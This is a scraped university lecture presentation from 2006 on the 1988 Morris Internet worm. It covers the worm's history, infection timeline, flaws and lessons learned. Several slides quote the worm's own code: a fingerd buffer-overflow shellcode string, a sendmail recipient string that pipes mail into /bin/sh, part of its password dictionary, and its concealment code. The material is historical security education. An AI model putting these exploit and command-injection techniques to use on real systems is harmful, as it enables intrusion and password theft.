1 / 15

The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006

The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006. “ There may be a virus loose on the internet “ Andy Sudduth of Harvard, 34 minutes after midnight, Nov. 3, 1988. Creator and His Creation. November 2nd, 1988:

gonzalesa
Download Presentation

The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. The Internet Worm of 1988 Svetlana V. Drachova-Strang Clemson University CPSC 681 April 25, 2006 “ There may be a virus loose on the internet “ Andy Sudduth of Harvard, 34 minutes after midnight, Nov. 3, 1988

  2. Creator and His Creation • November 2nd, 1988: Robert Tappan Morris, 23-year old cs student from Cornell released a worm from MIT. Aside:son of Robert Morris, Sr. Chief Scientist at the National Computer Security Center, subdivision of NSA • The Morris worm: Consisted of several files of cleverly-written C code • Intentions: Probe the size of Internet with a self-replicating program ? • Effects: -- Internet down -- Thousands of machines disconnected from Internet -- Worm on the loose

  3. What the worm DID NOT do: • Did not cause physical damage to computer systems. • Did not alter or destroy system or user files • Did not affect machines running OSs other than VAX or BSD Unix • Did not save or transmit the cracked passwords • Did not attempt to gain superuser access • Did not plant any trojans or timebombs • Did not attack machines that were not attached to the internet

  4. What the worm DID: • Self-propagated through Internet infecting and reinfecting machines • Self-replicated unstoppably • Explored several vulnerabilities: fingerd, sendmail, passwords • Had flaws that made it especially destructive, and/or impaired the intended functionality • Cracked user passwords • Disguised itself by several clever means

  5. History and Origins • “Worms were good at first”: • Noble usage • 1975: “tapeworm” John Brunner’s The Shockwave Rider • early 1980s: John Shoch, Jon Hupp created five worms for executing helpful tasks on the internet: billboard worm, vampire worm, etc.: “ a useful way to run distributed diagnostics” • Mishap and the first lesson learned • Conclusions We have the tools at hand to experiment with distributed computations in their fullest form: dynamically allocating resources and moving from machine to machine. Furthermore, local networks supporting relatively large numbers of hosts now provide a rich environment for this kind of experimentation. The basic worm programs described here demonstrate the ease with which these mechanisms can be explored… (J. Shoch, J. Hupp)

  6. The Horrible Night 6:00 PM The Worm is launched 8:49 PM The Worm infects a VAX-8600 at the University of Utah 9:09 PM The Worm initiates the first attack to infect others 9:21 PM Load average on the system reaches 5 (sh be 1) 9:41 PM Load average reaches 7 10:01 PM Load average reaches 16 10:06 PM No new processes can be started. System unusable 10:20 PM System administrator kills off the worms 10:41 PM System is reinfected, load average reaches 27 10:49 PM System administrator shuts down and restarts the system 11:21 PM Reinfestation causes load average to reach 37.

  7. fingerd Vulnerability Exploited • fingerd has a 512 char buffer • worm calls write() with 536 char + newline argument • 6 words overwrite system stack including return PC, that makes a system • call version of execve(“/bin/sh”)that installs the worm on the target system. • char buf[536] = "\335\217/sh\0\335\217/bin\320^Z\335\0\335\0\335Z\335\003 • \320^\\\274;\344\371\344\342\241\256\343\350\357\256\362\351"; • /* Rewrite part of the stack frame */ • l556 = 0x7fffe9fc; l560 = 0x7fffe8a8; l564 = 0x7fffe8bc; • l568 = 0x28000000; l552 = 0x0001c020; • #ifdef sun /* Reverse the word order for the Sun machines*/ • l556 = byte_swap(l556); l560 = byte_swap(l560); l564 = byte_swap(l564); • l568 = byte_swap(l568); l552 = byte_swap(l552); • #endif sun • write(s, buf, sizeof(buf)); /* sizeof == 536 */ • write(s, XS("\n"), 1); • sleep(5); • if (test_connection(s, s, 10)) { • *fd1 = s; *fd2 = s;return 1; • }

  8. sendmail Vulnerability Exploited • TCP flaw - DEBUG flag allows to send mail to a process instead of user. • Worm sends message with DEBUG flad to a cleverly built recepient, • String sets up command deleting header, passes body to command interpreter. • It will compile code that opens a connection and gets a copy of the worm • #define MAIL_FROM "mail from:</dev/null>\n" • #define MAIL_RCPT "rcpt to:<\"| sed \'1,/^$/d\' | /bin/sh ; exit 0\">\n" • send_text(s, XS(MAIL_FROM)); • sprintf(l548, XS(MAIL_RCPT), i, i); • send_text(s, l548); • send_text(s, XS("data\n")); • compile_slave(host, s, saddr); • send_text(s, XS("\n.\n")); • send_text(s, XS("quit\n"));

  9. Password Cracking • Exploited 2 vulnerabilities: • System: /etc/passwd file • User: weak passwords • Attack has 4 stages: • 0: seek other machines to infect from /etc/hosts.equiv and /.rhosts • 1: obvious password guesses (35% success) • 2: worm’s internal dictionary • 3: system’s online dictionary in /usr/dict/words

  10. Worm’s dictionary char *wds[ ] = /* 0x21a74 */ {"academia", "aerobics", "airplane", "albany", "albatross", "albert", "alex", "alexander", "algebra", "aliases", "alphabet", "amorphous", "analog", "anchor", "andromache", "animals", "answer", "anthropogenic", "anvils", "anything", "aria", "ariadne", "arrow", "arthur", "athena", "atmosphere", "aztecs", "azure", "bacchus", "bailey", "banana", "bananas", "bandit", "banks", "barber", "baritone", "bass", "bassoon", "batman", "beater", "beauty", "beethoven", "beloved", "benz", "beowulf", "berkeley", "berliner", "beryl", "beverly", "bicameral", "brenda", "brian", "bridget", "broadway", "bumbling", "burgess", "campanile", "cantor", "cardinal", . . . "tarragon", "taylor", "telephone", "temptation", "thailand", "tiger", "toggle", "tomato", "topography", "tortoise", "toyota", "trails", "trivial", "trombone", "tubas", "tuttle", "umesh", "unhappy", "unicorn", "unknown", "urchin", "utility", "vasant", "vertigo", "vicky", "village", "virginia", "warren", "water", "weenie", "whatnot", "whiting", "whitney", "will", "william", "williamsburg", "willie", "winston", "wisconsin", "wizard", "wombat", "woodwind", "wormwood", "yacov", "yang", "yellowstone", "yosemite", "zimmerman", 0 }; /* contained 421 words*/

  11. Concealing Itself • Rename itself to sh, which is also the name of the Bourne shell strcpy(argv[0], XS("sh")); • Set core dump size to zero: rl.rlim_cur = 0; rl.rlim_max = 0; if (setrlimit(RLIMIT_CORE, &rl)) ; • Deleting parent process and manipulating process id • Used encryption

  12. Oops, … The Worm Had Flaws • Major flaws in the program code: • only ≈14% chance that the worm will check if the target system has already been infected • 1 in 7 chance (instead of 1 in 10,000) that listening worm will not listen for a pleasequit() signal • Used TCP socket command sendto instead of the UDP send to send 1B of data from each machine to the originating Berkely machine 128.32.137.13 port 11357 • There were other flaws as well

  13. Worm Map [from http://snowplow.org/tom/worm/history.html]

  14. Complex Logic of the Worm

  15. Lessons Learned • The Morris Worm was the first worm to bring Internet down • Worm is a powerful tool capable of inflicting a lot of damage • Computer crime is punishable under the Computer Fraud and Abuse Act of 1986. • Later Mr. Morris himself stated that the incident “has raised the public awareness to a considerable degree”. [R H Morris, quoted in the New York Times 11/5/88]. • System administrators increased their efforts in protecting their systems

More Related